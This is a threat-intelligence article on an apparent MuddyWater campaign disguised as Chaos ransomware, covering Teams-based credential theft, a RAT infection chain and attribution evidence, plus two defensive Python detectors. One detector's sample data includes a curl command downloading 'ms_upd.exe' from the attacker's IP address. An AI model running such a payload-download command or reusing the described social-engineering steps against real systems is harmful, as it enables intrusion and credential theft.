MuddyWater False Flag Ransomware Attack
The Iranian state-sponsored threat group MuddyWater, also tracked under aliases such as Mango Sandstorm, Seedworm, and Static Kitten, has been linked to a sophisticated ransomware campaign that investigators describe as a false-flag operation. Although the intrusion initially resembled activity associated with a conventional Ransomware-as-a-Service (RaaS) operation using the Chaos ransomware brand, deeper analysis revealed characteristics consistent with a targeted state-sponsored cyberattack disguised as financially motivated extortion.
The operation, identified in early 2026, relied heavily on social engineering through Microsoft Teams. Attackers conducted highly interactive engagement sessions with victims, leveraging screen-sharing functionality to harvest credentials and manipulate multi-factor authentication processes. After obtaining access, the threat actors abandoned traditional ransomware tactics such as large-scale file encryption and instead focused on data theft, stealthy persistence, and long-term network access through remote management utilities.
Cybercrime Tradecraft Used to Conceal State Operations
Researchers believe the campaign reflects a deliberate effort by MuddyWater to obscure attribution by adopting tools and techniques commonly associated with cybercriminal ecosystems. The group has increasingly integrated commercially available underground malware and remote access frameworks into its operations, including tools such as CastleRAT and Tsundere.
This tactic aligns with previous MuddyWater campaigns that blended espionage and destructive activity with ransomware-style operations. In 2020, the group targeted major Israeli organizations using the PowGoop loader to deploy a destructive variant of Thanos ransomware. In 2023, Microsoft linked the group to DEV-1084, an actor associated with the DarkBit persona, during attacks disguised as ransomware incidents. By late 2025, Iranian-linked operators were also suspected of using Qilin ransomware against an Israeli government hospital.
Security researchers concluded that the latest campaign likely involved Iranian-affiliated operators working through established cybercriminal infrastructure while pursuing broader geopolitical objectives. The use of Qilin and participation in ransomware affiliate ecosystems likely provided operational cover, plausible deniability, and access to mature attack capabilities while helping the attackers evade heightened Israeli defensive monitoring.
Chaos RaaS: A Growing Extortion Ecosystem
Chaos emerged in early 2025 as a Ransomware-as-a-Service operation known for aggressive double-extortion tactics. The group promoted its affiliate program on underground cybercrime forums such as RAMP and RehubCom and rapidly expanded its operational reach.
Chaos campaigns commonly combine email flooding, voice phishing, and Microsoft Teams impersonation attacks in which threat actors pose as IT support staff. Victims are manipulated into installing remote access applications like Microsoft Quick Assist, enabling attackers to establish footholds within corporate environments before escalating privileges, moving laterally, and deploying ransomware payloads.
The group has also demonstrated increasingly aggressive extortion models:
- Double extortion through data theft and ransom demands
- Triple extortion involving threats of distributed denial-of-service (DDoS) attacks
- Quadruple extortion tactics that include threats to contact customers, partners, or competitors to intensify pressure on victims
By March 2026, Chaos had claimed 36 victims on its leak platform, with most organizations located in the United States. The construction, manufacturing, and business services sectors appeared among the most heavily targeted industries.
Anatomy of the Intrusion
During the investigated intrusion, attackers initiated external Microsoft Teams conversations with employees to gain trust and encourage screen-sharing sessions. Compromised user accounts were then leveraged for reconnaissance, persistence, lateral movement, and data exfiltration.
While connected to victim systems, the attackers executed reconnaissance commands, accessed VPN-related files, and instructed users to manually enter credentials into locally created text documents. In several instances, AnyDesk was installed to strengthen remote access capabilities.
The threat actors additionally used Remote Desktop Protocol (RDP) to retrieve an executable named 'ms_upd.exe' from the external server address 172.86.126.208 using the curl utility. Once launched, the malware initiated a multi-stage infection chain designed to deploy additional malicious components and establish persistent command-and-control communications.
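The curl-from-a-bare-IP download described above is a pattern that process-creation telemetry (Sysmon Event ID 1 or equivalent) can surface. The following is an added example written for this page, not code from the report or any named vendor; the event records are constructed, and only the 172.86.126.208 address and the 'ms_upd.exe' name come from the text. Internal (RFC 1918) destinations are skipped because build systems and admin tooling legitimately fetch from bare internal IPs.

```python
import ipaddress
import re
from typing import NamedTuple

# Constructed process-creation records: (user, parent image, image, command line).
SAMPLE_EVENTS = [
    ("CORP\\jdoe", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe -o C:\\Users\\jdoe\\ms_upd.exe http://172.86.126.208/ms_upd.exe"),
    ("CORP\\asmith", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe https://updates.example.com/api/status"),
    ("CORP\\build", "C:\\Program Files\\Jenkins\\jenkins.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe -L -o tool.exe http://10.20.30.40/releases/tool.exe"),
    ("CORP\\jdoe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\jdoe\\Desktop\\vpn.txt"),
]

# URL whose host part is a literal IPv4 address (optionally with a port).
BARE_IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/\S*", re.IGNORECASE)
# Extensions that indicate an executable payload rather than an API call.
EXEC_EXT = re.compile(r"\.(exe|dll|scr|ps1|bat)\b", re.IGNORECASE)
OUTPUT_EXE = re.compile(r"(?:-o|--output)\s+\S+\.exe\b", re.IGNORECASE)

class Finding(NamedTuple):
    user: str
    parent: str
    url: str
    reason: str

def is_curl(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("curl.exe", "curl")

def analyze(events):
    """Flag curl invocations that download from a public bare-IP host."""
    findings = []
    for user, parent, image, cmdline in events:
        if not is_curl(image):
            continue
        m = BARE_IP_URL.search(cmdline)
        if not m:
            continue  # hostname-based URLs are out of scope for this rule
        if ipaddress.ip_address(m.group(1)).is_private:
            continue  # internal artifact servers are expected to be bare IPs
        url = m.group(0)
        reasons = ["public bare IPv4 host"]
        if EXEC_EXT.search(url) or OUTPUT_EXE.search(cmdline):
            reasons.append("executable payload")
        findings.append(Finding(user, parent, url, "; ".join(reasons)))
    return findings
```

Recording the parent image alongside the finding matters here because a curl spawned from an interactive cmd.exe during an RDP session reads very differently from one spawned by a CI agent.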
Malware Arsenal Behind the Campaign
The infection chain incorporated several distinct malware components that worked together to maintain persistence and execute remote commands:
- 'ms_upd.exe' (Stagecomp) gathered system information and contacted a command-and-control server to download secondary payloads including 'game.exe,' 'WebView2Loader.dll,' and 'visualwincomp.txt'
- 'game.exe' (Darkcomp) functioned as a custom remote access trojan masquerading as a legitimate Microsoft WebView2 application based on the official WebView2APISample project
- 'WebView2Loader.dll' served as a legitimate dependency required for Microsoft Edge WebView2 functionality
- 'visualwincomp.txt' contained encrypted configuration data used by the RAT to identify command-and-control infrastructure
Once active, the remote access trojan continuously communicated with its command server every 60 seconds, allowing operators to execute PowerShell scripts, run system commands, manipulate files, and spawn interactive command-line sessions.
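A fixed 60-second callback interval, as described above, is a property defenders can hunt for in proxy or firewall connection logs. The following is an added example written for this page, not code from the report; the connection records are constructed and the destination addresses are documentation-range placeholders. It groups outbound connections by source host and destination, then flags pairs whose median inter-connection gap sits near the expected period with low jitter.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Build a constructed series of (timestamp, source host, destination) records
# from a list of second-valued gaps; purely synthetic sample data.
def _series(host, dst, start, gaps):
    t, out = start, []
    for g in gaps:
        t += timedelta(seconds=g)
        out.append((t, host, dst))
    return out

START = datetime(2026, 3, 1, 9, 0, 0)
SAMPLE_CONNECTIONS = (
    # Regular ~60 s callbacks with a few seconds of natural drift.
    _series("ws-042", "203.0.113.77:443", START, [60, 61, 59, 60, 60, 62, 58, 60, 60, 61])
    # Bursty, human-driven traffic to an update service.
    + _series("ws-042", "updates.example.com:443", START, [5, 400, 12, 900, 33, 70, 250, 8, 610, 15])
    # Too few events to judge periodicity.
    + _series("ws-017", "198.51.100.9:443", START, [60, 60])
)

def beacon_candidates(connections, period=60, tolerance=0.1, min_events=8):
    """Return (host, dst, median_gap, jitter) for pairs with regular ~period-second callbacks."""
    buckets = defaultdict(list)
    for ts, host, dst in connections:
        buckets[(host, dst)].append(ts)
    results = []
    for (host, dst), times in buckets.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(gaps)
        if median <= 0:
            continue
        # Median absolute deviation relative to the median: robust to a few outliers.
        jitter = statistics.median(abs(g - median) for g in gaps) / median
        if abs(median - period) <= period * tolerance and jitter <= tolerance:
            results.append((host, dst, median, round(jitter, 3)))
    return results
```

Operators can add randomised sleep to blur this signal, so treat the tolerance as a tuning knob and corroborate a hit with the process that owns the socket rather than alerting on timing alone.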
Evidence Linking the Operation to MuddyWater
Attribution to MuddyWater was strengthened through the discovery of a code-signing certificate associated with 'Donald Gay,' which was used to sign the 'ms_upd.exe' malware sample. The same certificate had previously been linked to MuddyWater malware, including a CastleLoader downloader variant known as Fakeset.
Researchers noted that the operation demonstrated a significant convergence between state-sponsored espionage activity and cybercriminal operational methods. The integration of ransomware branding, extortion negotiations, and commercially available malware frameworks complicated attribution efforts and diverted defensive attention toward immediate ransom response activities rather than long-term persistence mechanisms established through remote access tools.
Why the Attack Stood Out
One of the most unusual aspects of the campaign was the apparent absence of widespread file encryption despite the use of Chaos ransomware artifacts. This deviation from standard ransomware behavior strongly suggests that the ransomware component functioned primarily as camouflage or operational misdirection rather than the primary mission objective.
The campaign also highlights a growing trend among Iranian threat actors to incorporate cybercrime tooling into state-directed operations. By leveraging existing underground infrastructures and malware ecosystems, groups such as MuddyWater gain greater operational flexibility, reduce internal development costs, and significantly complicate attribution efforts for defenders and intelligence analysts alike.